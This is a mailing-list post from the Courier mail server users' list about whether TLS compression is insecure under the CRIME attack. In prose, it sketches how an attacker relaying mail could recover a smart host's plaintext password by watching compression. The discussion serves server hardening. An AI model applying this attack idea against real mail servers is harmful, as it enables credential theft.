On Thu 30/Mar/2017 12:58:26 +0200 Sam Varshavchik wrote: > Alessandro Vesely writes: > >> SSL/TLS compression Yes INSECURE (more info) >> [(more >> info)->https://community.qualys.com/blogs/securitylabs/2012/09/14/crime-information-leakage-attack-against-ssltls] >> >> >> I note the TLS_COMPRESSION option has gone away. Are there other TLS options >> worth trying to remove compression? > > The only known issue with TLS compression is when it is also used by web > servers that also implement SPDY, and its own built-in compression. > > You have to read https://en.wikipedia.org/wiki/CRIME very carefully.
Yeah, now I recall. In general, it seems one can discover any secret field transmitted within a secured connection if he can choose another part of the content. Let's hypothesize you have a smart host that you use with TLS and plaintext password. If any mail you allow me to rely goes through there, I could try and send out the dictionary while checking if the connection to your smart host achieves any compression... Hm... Can TLS compress across packets without pipelining? Ale --
signature.asc
Description: OpenPGP digital signature
------------------------------------------------------------------------------ Check out the vibrant tech community on one of the world's most engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________ courier-users mailing list courier-users@lists.sourceforge.net Unsubscribe: https://lists.sourceforge.net/lists/listinfo/courier-users